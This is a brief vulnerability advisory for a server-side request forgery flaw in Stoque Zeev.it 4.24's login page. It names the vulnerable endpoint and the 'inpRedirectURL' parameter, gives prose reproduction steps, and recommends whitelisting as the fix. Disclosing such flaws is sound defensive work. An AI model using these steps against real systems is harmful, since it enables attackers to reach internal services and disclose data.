Stoque Zeev.it Server-Side Request Forgery Vulnerability in Login Page Redirect URL Parameter

A server-side request forgery (SSRF) vulnerability has been identified in Stoque Zeev.it version 4.24. The issue arises on the login page, specifically within the '/Login?inpLostSession=1' endpoint. The vulnerability is triggered by manipulating the 'inpRedirectURL' parameter, allowing remote attackers to send requests from the server to external resources under their control. This could potentially be used to access sensitive information or services.

Impact

Exploitation of this vulnerability allows attackers to use the application server as a proxy to access external resources, potentially leading to unauthorized information disclosure or interaction with internal services.

Reproduction

To reproduce this vulnerability, first set up a server to capture incoming requests. Then, send a request to the vulnerable login endpoint, including a crafted 'inpRedirectURL' parameter that points to your server. Once the request is processed, you should see the SSRF request logged on your server, indicating successful exploitation. This vulnerability can also be reproduced using Burp Suite by intercepting and modifying the request to test different domains and endpoints.

Remediation

It is recommended to implement whitelisting for the 'inpRedirectURL' parameter to restrict redirects to trusted domains only. Additionally, user input should be validated and sanitized before processing. Monitoring HTTP request logs for potential exploitation attempts can also help detect and respond to such attacks.